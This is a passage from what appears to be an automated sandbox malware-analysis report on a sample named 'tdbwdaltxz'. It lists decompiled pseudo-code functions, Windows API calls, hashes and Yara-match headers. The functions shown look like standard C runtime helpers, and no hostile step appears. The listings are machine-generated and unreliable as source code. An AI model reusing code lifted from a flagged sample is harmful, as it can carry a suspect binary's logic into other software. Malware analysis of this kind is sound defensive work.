                        • Opcode Fuzzy Hash: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                        • Instruction Fuzzy Hash: 47D18BB5D042589FCB14CFA8C8809EDBBB4FF08304F14817AE866FB391D634A956CB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E010615A0(void* __ecx, WCHAR* _a4) {
                        				WCHAR* _v8;
                        				WCHAR* _t15;
                        				int _t20;
                        				intOrPtr* _t22;
                        				void* _t27;
                        				int _t29;
                        				intOrPtr* _t32;
                        				WCHAR* _t33;
                        				WCHAR* _t35;
                        				WCHAR* _t36;
                        
                        				_t22 = _a4;
                        				_t27 = 1;
                        				_t32 = _t22;
                        				if(_t22 != 0) {
                        					do {
                        						_t20 = lstrlenW(_t32 + 4);
                        						_t32 =  *_t32;
                        						_t27 = _t27 + 1 + _t20;
                        					} while (_t32 != 0);
                        				}
                        				_t15 = HeapAlloc(GetProcessHeap(), 0, _t27 + _t27);
                        				_t33 = _t15;
                        				_v8 = _t15;
                        				_a4 = _t33;
                        				if(_t22 != 0) {
                        					do {
                        						_t35 = _t22 + 4;
                        						_t29 = lstrlenW(_t35);
                        						_t36 = _a4;
                        						lstrcpynW(_t36, _t35, _t29);
                        						_t33 =  &(_t36[_t29]);
                        						_a4 = _t33;
                        						if( *_t22 != 0) {
                        							 *_t33 = 0x3b;
                        							_t33 =  &(_t33[1]);
                        							_a4 = _t33;
                        						}
                        						_t22 =  *_t22;
                        					} while (_t22 != 0);
                        					_t15 = _v8;
                        				}
                        				 *_t33 = 0;
                        				return _t15;
                        			}

                        APIs
                        • lstrlenW.KERNEL32(?), ref: 010615B9
                        • GetProcessHeap.KERNEL32(00000000), ref: 010615CE
                        • HeapAlloc.KERNEL32(00000000), ref: 010615D5
                        • lstrlenW.KERNEL32(?), ref: 010615F4
                        • lstrcpynW.KERNEL32(?,?,00000000), ref: 01061602
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heaplstrlen$AllocProcesslstrcpyn
                        • String ID:
                        • API String ID: 3934205894-0
                        • Opcode ID: 86d28e5803d29a6b8cc05dcf7667daa43789470126c2053192b2e8e69938652d
                        • Instruction ID: 046c8494578fe25ddda53785ce6509faeddc8c0a349deb4468921b35c8b603d3
                        • Opcode Fuzzy Hash: 86d28e5803d29a6b8cc05dcf7667daa43789470126c2053192b2e8e69938652d
                        • Instruction Fuzzy Hash: 0B11A376900325EFDB218F98C484A9ABBECEF48350F19406AFE85D7204D775AD418BE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 66%
                        			E00403694(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				signed int* _t52;
                        				signed int _t53;
                        				intOrPtr _t54;
                        				signed int _t58;
                        				signed int _t61;
                        				intOrPtr _t71;
                        				signed int _t75;
                        				signed int _t79;
                        				signed int _t81;
                        				signed int _t84;
                        				signed int _t85;
                        				signed int _t97;
                        				signed int* _t98;
                        				signed char* _t101;
                        				signed int _t107;
                        				void* _t111;
                        
                        				_push(0x10);
                        				_push(0x413518);
                        				E00401EE0(__ebx, __edi, __esi);
                        				_t75 = 0;
                        				_t52 =  *(_t111 + 0x10);
                        				_t81 = _t52[1];
                        				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
                        					L30:
                        					_t53 = 0;
                        					__eflags = 0;
                        					goto L31;
                        				} else {
                        					_t97 = _t52[2];
                        					if(_t97 != 0 ||  *_t52 < 0) {
                        						_t84 =  *_t52;
                        						_t107 =  *(_t111 + 0xc);
                        						if(_t84 >= 0) {
                        							_t107 = _t107 + 0xc + _t97;
                        						}
                        						 *(_t111 - 4) = _t75;
                        						_t101 =  *(_t111 + 0x14);
                        						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
                        							L10:
                        							_t54 =  *((intOrPtr*)(_t111 + 8));
                        							__eflags = _t84 & 0x00000008;
                        							if((_t84 & 0x00000008) == 0) {
                        								__eflags =  *_t101 & 0x00000001;
                        								if(( *_t101 & 0x00000001) == 0) {
                        									_t84 =  *(_t54 + 0x18);
                        									__eflags = _t101[0x18] - _t75;
                        									if(_t101[0x18] != _t75) {
                        										__eflags = _t84;
                        										if(_t84 == 0) {
                        											goto L32;
                        										} else {
                        											__eflags = _t107;
                        											if(_t107 == 0) {
                        												goto L32;
                        											} else {
                        												__eflags =  *_t101 & 0x00000004;
                        												_t79 = 0;
                        												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
                        												__eflags = _t75;
                        												 *(_t111 - 0x20) = _t75;
                        												goto L29;
                        											}
                        										}
                        									} else {
                        										__eflags = _t84;
                        										if(_t84 == 0) {
                        											goto L32;
                        										} else {
                        											__eflags = _t107;
                        											if(_t107 == 0) {
                        												goto L32;
                        											} else {
                        												E00403120(_t107, E00402768(_t84,  &(_t101[8])), _t101[0x14]);
                        												goto L29;
                        											}
                        										}
                        									}
                        								} else {
                        									__eflags =  *(_t54 + 0x18);
                        									if( *(_t54 + 0x18) == 0) {
                        										goto L32;
                        									} else {
                        										__eflags = _t107;
                        										if(_t107 == 0) {
                        											goto L32;
                        										} else {
                        											E00403120(_t107,  *(_t54 + 0x18), _t101[0x14]);
                        											__eflags = _t101[0x14] - 4;
                        											if(_t101[0x14] == 4) {
                        												__eflags =  *_t107;
                        												if( *_t107 != 0) {
                        													_push( &(_t101[8]));
                        													_push( *_t107);
                        													goto L21;
                        												}
                        											}
                        											goto L29;
                        										}
                        									}
                        								}
                        							} else {
                        								_t84 =  *(_t54 + 0x18);
                        								goto L12;
                        							}
                        						} else {
                        							_t71 =  *0x415c6c; // 0x0
                        							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
                        							if(_t71 == 0) {
                        								goto L10;
                        							} else {
                        								 *0x40e160();
                        								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
                        								L12:
                        								if(_t84 == 0 || _t107 == 0) {
                        									L32:
                        									E0040579A(_t75, _t84, _t97, _t107);
                        									asm("int3");
                        									_push(8);
                        									_push(0x413538);
                        									E00401EE0(_t75, _t101, _t107);
                        									_t98 =  *(_t111 + 0x10);
                        									_t85 =  *(_t111 + 0xc);
                        									__eflags =  *_t98;
                        									if(__eflags >= 0) {
                        										_t103 = _t85 + 0xc + _t98[2];
                        										__eflags = _t85 + 0xc + _t98[2];
                        									} else {
                        										_t103 = _t85;
                        									}
                        									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
                        									_t108 =  *(_t111 + 0x14);
                        									_push( *(_t111 + 0x14));
                        									_push(_t98);
                        									_push(_t85);
                        									_t77 =  *((intOrPtr*)(_t111 + 8));
                        									_push( *((intOrPtr*)(_t111 + 8)));
                        									_t58 = E00403694(_t77, _t103, _t108, __eflags) - 1;
                        									__eflags = _t58;
                        									if(_t58 == 0) {
                        										_t61 = E00404404(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
                        									} else {
                        										_t61 = _t58 - 1;
                        										__eflags = _t61;
                        										if(_t61 == 0) {
                        											_t61 = E00404414(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
                        										}
                        									}
                        									 *(_t111 - 4) = 0xfffffffe;
                        									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                        									return _t61;
                        								} else {
                        									 *_t107 = _t84;
                        									_push( &(_t101[8]));
                        									_push(_t84);
                        									L21:
                        									 *_t107 = E00402768();
                        									L29:
                        									 *(_t111 - 4) = 0xfffffffe;
                        									_t53 = _t75;
                        									L31:
                        									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                        									return _t53;
                        								}
                        							}
                        						}
                        					} else {
                        						goto L30;
                        					}
                        				}
                        			}




















                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
                        • Opcode ID: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                        • Instruction ID: c36bffaf7fe8f9e15fcbe67479aef6d6b820bcd02780ea586b95a92c856a1c7e
                        • Opcode Fuzzy Hash: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                        • Instruction Fuzzy Hash: E45103F6600202AFDB299F21C840B6A7BA9EF40B06F14813FE805672D1D739EE41C798
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01071597(void* __edx, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				intOrPtr _v12;
                        				int _v20;
                        				void* __ebx;
                        				int _t35;
                        				int _t38;
                        				intOrPtr* _t44;
                        				int _t47;
                        				short* _t49;
                        				intOrPtr _t50;
                        				intOrPtr _t54;
                        				int _t55;
                        				int _t60;
                        				char* _t63;
                        
                        				_t63 = _a8;
                        				if(_t63 == 0) {
                        					L5:
                        					return 0;
                        				}
                        				_t50 = _a12;
                        				if(_t50 == 0) {
                        					goto L5;
                        				}
                        				if( *_t63 != 0) {
                        					E01065839(_t50,  &_v20, __edx, _a16);
                        					_t35 = _v20;
                        					__eflags =  *(_t35 + 0xa8);
                        					if( *(_t35 + 0xa8) != 0) {
                        						_t38 = E010703F5( *_t63 & 0x000000ff,  &_v20);
                        						__eflags = _t38;
                        						if(_t38 == 0) {
                        							__eflags = _a4;
                        							_t60 = 1;
                        							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t63, 1, _a4, 0 | _a4 != 0x00000000);
                        							if(__eflags != 0) {
                        								L21:
                        								__eflags = _v8;
                        								if(_v8 != 0) {
                        									_t54 = _v12;
                        									_t31 = _t54 + 0x70;
                        									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                        									__eflags =  *_t31;
                        								}
                        								return _t60;
                        							}
                        							L20:
                        							_t44 = E010647CC(__eflags);
                        							_t60 = _t60 | 0xffffffff;
                        							__eflags = _t60;
                        							 *_t44 = 0x2a;
                        							goto L21;
                        						}
                        						_t60 = _v20;
                        						__eflags =  *(_t60 + 0x74) - 1;
                        						if( *(_t60 + 0x74) <= 1) {
                        							L15:
                        							__eflags = _t50 -  *(_t60 + 0x74);
                        							L16:
                        							if(__eflags < 0) {
                        								goto L20;
                        							}
                        							__eflags = _t63[1];
                        							if(__eflags == 0) {
                        								goto L20;
                        							}
                        							L18:
                        							_t60 =  *(_t60 + 0x74);
                        							goto L21;
                        						}
                        						__eflags = _t50 -  *(_t60 + 0x74);
                        						if(__eflags < 0) {
                        							goto L16;
                        						}
                        						__eflags = _a4;
                        						_t47 = MultiByteToWideChar( *(_t60 + 4), 9, _t63,  *(_t60 + 0x74), _a4, 0 | _a4 != 0x00000000);
                        						_t60 = _v20;
                        						__eflags = _t47;
                        						if(_t47 != 0) {
                        							goto L18;
                        						}
                        						goto L15;
                        					}
                        					_t55 = _a4;
                        					__eflags = _t55;
                        					if(_t55 != 0) {
                        						 *_t55 =  *_t63 & 0x000000ff;
                        					}
                        					_t60 = 1;
                        					goto L21;
                        				}
                        				_t49 = _a4;
                        				if(_t49 != 0) {
                        					 *_t49 = 0;
                        				}
                        				goto L5;
                        			}


















                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 010715CB
                        • __isleadbyte_l.LIBCMT ref: 010715F9
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 01071627
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0107165D
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 5535c6c9c1236ba3afa5c93c3669862bb266e21c5b1217fb2cad64e5ce3a2d97
                        • Instruction ID: 0d806addd46576e8d9c343e52224aa2292d5002b4fb6148188df7f120cb8224e
                        • Opcode Fuzzy Hash: 5535c6c9c1236ba3afa5c93c3669862bb266e21c5b1217fb2cad64e5ce3a2d97
                        • Instruction Fuzzy Hash: 0B31CF31E00246EFEB268F69C844BAA7FFAFF45210F1941A9F5A1971D0E731D850CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040B766(void* _a4, long _a8, DWORD* _a12) {
                        				void* _t13;
                        
                        				_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, 0);
                        				if(_t13 == 0 && GetLastError() == 6) {
                        					E0040B74F();
                        					E0040B711();
                        					_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, _t13);
                        				}
                        				return _t13;
                        			}





                        APIs
                        • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000), ref: 0040B77D
                        • GetLastError.KERNEL32(?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008,?,0040A922,00000000), ref: 0040B789
                          • Part of subcall function 0040B74F: CloseHandle.KERNEL32(FFFFFFFE,0040B799,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008), ref: 0040B75F
                        • ___initconout.LIBCMT ref: 0040B799
                          • Part of subcall function 0040B711: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040B740,0040AF0D,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B724
                        • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B7AE
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                        • Instruction ID: 9be2d2e95ebdf4ca364c863a04f8f34c4778b8d92ece9612039581527531bafd
                        • Opcode Fuzzy Hash: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                        • Instruction Fuzzy Hash: 72F01236400124BBCF162F96DC049CA3F65EB883B1B008435FA18A6161C7318870DBD8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 65%
                        			E00403C90(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                        				signed int _v8;
                        				signed int _v12;
                        				intOrPtr* _v16;
                        				signed int _v20;
                        				char _v24;
                        				intOrPtr _v28;
                        				signed int _v36;
                        				void* _v40;
                        				intOrPtr _v44;
                        				signed int _v48;
                        				intOrPtr _v56;
                        				void _v60;
                        				signed char* _v68;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t74;
                        				void* _t75;
                        				char _t76;
                        				signed char _t78;
                        				signed int _t80;
                        				signed char* _t81;
                        				signed int _t82;
                        				signed int _t83;
                        				intOrPtr* _t87;
                        				void* _t90;
                        				signed char* _t93;
                        				intOrPtr* _t96;
                        				signed char _t97;
                        				intOrPtr _t98;
                        				intOrPtr _t99;
                        				intOrPtr* _t101;
                        				signed int _t102;
                        				signed int _t103;
                        				signed char _t108;
                        				signed char* _t111;
                        				signed int _t112;
                        				signed char* _t116;
                        				void* _t121;
                        				signed int _t123;
                        				void* _t130;
                        				void* _t131;
                        
                        				_t110 = __edx;
                        				_t100 = __ecx;
                        				_t96 = _a4;
                        				if( *_t96 == 0x80000003) {
                        					return _t74;
                        				} else {
                        					_push(_t121);
                        					_t75 = E004029B3(_t96, __ecx, __edx, _t121);
                        					if( *((intOrPtr*)(_t75 + 8)) != 0) {
                        						__imp__EncodePointer(0);
                        						_t121 = _t75;
                        						if( *((intOrPtr*)(E004029B3(_t96, __ecx, __edx, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
                        							_t87 = E00402E31(__edx, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
                        							_t130 = _t130 + 0x1c;
                        							if(_t87 != 0) {
                        								L16:
                        								return _t87;
                        							}
                        						}
                        					}
                        					_t76 = _a20;
                        					_v24 = _t76;
                        					_v20 = 0;
                        					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
                        						_push(_a28);
                        						E00402D64(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
                        						_t112 = _v36;
                        						_t131 = _t130 + 0x18;
                        						_t87 = _v40;
                        						_v16 = _t87;
                        						_v8 = _t112;
                        						if(_t112 < _v28) {
                        							_t102 = _t112 * 0x14;
                        							_v12 = _t102;
                        							do {
                        								_t103 = 5;
                        								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
                        								_t131 = _t131 + 0xc;
                        								if(_v60 <= _t90 && _t90 <= _v56) {
                        									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
                        									_t108 = _t93[4];
                        									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
                        										if(( *_t93 & 0x00000040) == 0) {
                        											_push(0);
                        											_push(1);
                        											E0040386B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
                        											_t112 = _v8;
                        											_t131 = _t131 + 0x30;
                        										}
                        									}
                        								}
                        								_t112 = _t112 + 1;
                        								_t87 = _v16;
                        								_t102 = _v12 + 0x14;
                        								_v8 = _t112;
                        								_v12 = _t102;
                        							} while (_t112 < _v28);
                        						}
                        						goto L16;
                        					}
                        					E0040579A(_t96, _t100, _t110, _t121);
                        					asm("int3");
                        					_t111 = _v68;
                        					_push(_t96);
                        					_push(_t121);
                        					_push(0);
                        					_t78 = _t111[4];
                        					if(_t78 == 0) {
                        						L41:
                        						_t80 = 1;
                        					} else {
                        						_t101 = _t78 + 8;
                        						if( *_t101 == 0) {
                        							goto L41;
                        						} else {
                        							_t116 = _a4;
                        							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
                        								_t97 = _t116[4];
                        								_t123 = 0;
                        								if(_t78 == _t97) {
                        									L33:
                        									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
                        										_t81 = _a8;
                        										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
                        											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
                        												_t123 = 1;
                        											}
                        										}
                        									}
                        									_t80 = _t123;
                        								} else {
                        									_t59 = _t97 + 8; // 0x6e
                        									_t82 = _t59;
                        									while(1) {
                        										_t98 =  *_t101;
                        										if(_t98 !=  *_t82) {
                        											break;
                        										}
                        										if(_t98 == 0) {
                        											L29:
                        											_t83 = _t123;
                        										} else {
                        											_t99 =  *((intOrPtr*)(_t101 + 1));
                        											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
                        												break;
                        											} else {
                        												_t101 = _t101 + 2;
                        												_t82 = _t82 + 2;
                        												if(_t99 != 0) {
                        													continue;
                        												} else {
                        													goto L29;
                        												}
                        											}
                        										}
                        										L31:
                        										if(_t83 == 0) {
                        											goto L33;
                        										} else {
                        											_t80 = 0;
                        										}
                        										goto L42;
                        									}
                        									asm("sbb eax, eax");
                        									_t83 = _t82 | 0x00000001;
                        									goto L31;
                        								}
                        							} else {
                        								goto L41;
                        							}
                        						}
                        					}
                        					L42:
                        					return _t80;
                        				}
                        			}














































                        APIs
                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00403CB5
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                        • Instruction ID: 27d9d21774ce73f4523aea127e5a37313707127f13db8d93af602d3374e0ea50
                        • Opcode Fuzzy Hash: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                        • Instruction Fuzzy Hash: E9415B72900109EFCF16DF94CE81AEEBBB9BF48305F1840AAF905B7291D3399A50DB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E004018D4(void* __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                        				intOrPtr _v0;
                        				void* _v808;
                        				int _t10;
                        				intOrPtr _t15;
                        				signed int _t16;
                        				signed int _t18;
                        				signed int _t20;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				intOrPtr _t25;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				intOrPtr _t29;
                        				intOrPtr* _t31;
                        				intOrPtr* _t33;
                        				void* _t36;
                        
                        				_t29 = __esi;
                        				_t28 = __edi;
                        				_t27 = __edx;
                        				_t24 = __ecx;
                        				_t23 = __ebx;
                        				_t36 = _t24 -  *0x415010; // 0xcf17a32a
                        				if(_t36 != 0) {
                        					_t31 = _t33;
                        					_t10 = IsProcessorFeaturePresent(0x17);
                        					if(_t10 != 0) {
                        						_t24 = 2;
                        						asm("int 0x29");
                        					}
                        					 *0x415a48 = _t10;
                        					 *0x415a44 = _t24;
                        					 *0x415a40 = _t27;
                        					 *0x415a3c = _t23;
                        					 *0x415a38 = _t29;
                        					 *0x415a34 = _t28;
                        					 *0x415a60 = ss;
                        					 *0x415a54 = cs;
                        					 *0x415a30 = ds;
                        					 *0x415a2c = es;
                        					 *0x415a28 = fs;
                        					 *0x415a24 = gs;
                        					asm("pushfd");
                        					_pop( *0x415a58);
                        					 *0x415a4c =  *_t31;
                        					 *0x415a50 = _v0;
                        					 *0x415a5c =  &_a4;
                        					 *0x415998 = 0x10001;
                        					_t15 =  *0x415a50; // 0x0
                        					 *0x415954 = _t15;
                        					 *0x415948 = 0xc0000409;
                        					 *0x41594c = 1;
                        					 *0x415958 = 1;
                        					_t16 = 4;
                        					 *((intOrPtr*)(0x41595c + _t16 * 0)) = 2;
                        					_t18 = 4;
                        					_t25 =  *0x415010; // 0xcf17a32a
                        					 *((intOrPtr*)(_t31 + _t18 * 0 - 8)) = _t25;
                        					_t20 = 4;
                        					_t26 =  *0x415014; // 0x30e85cd5
                        					 *((intOrPtr*)(_t31 + (_t20 << 0) - 8)) = _t26;
                        					return E00401F2A("HYA");
                        				} else {
                        					return __eax;
                        				}
                        			}

                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401F5D
                        • ___raise_securityfailure.LIBCMT ref: 00402045
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor___raise_securityfailure
                        • String ID: HYA
                        • API String ID: 3761405300-3949630065
                        • Opcode ID: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                        • Instruction ID: 6cb4d069ac1d3707beaa45bb2dd9a615a7934397750866ae2a5b0aac751b91a7
                        • Opcode Fuzzy Hash: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                        • Instruction Fuzzy Hash: 662103B56A1A01DBD310DF55F9D6AC43BA0BF88394F50D23AE5098ABB0D3B45880CF4E
                        Uniqueness

                        Uniqueness Score: -1.00%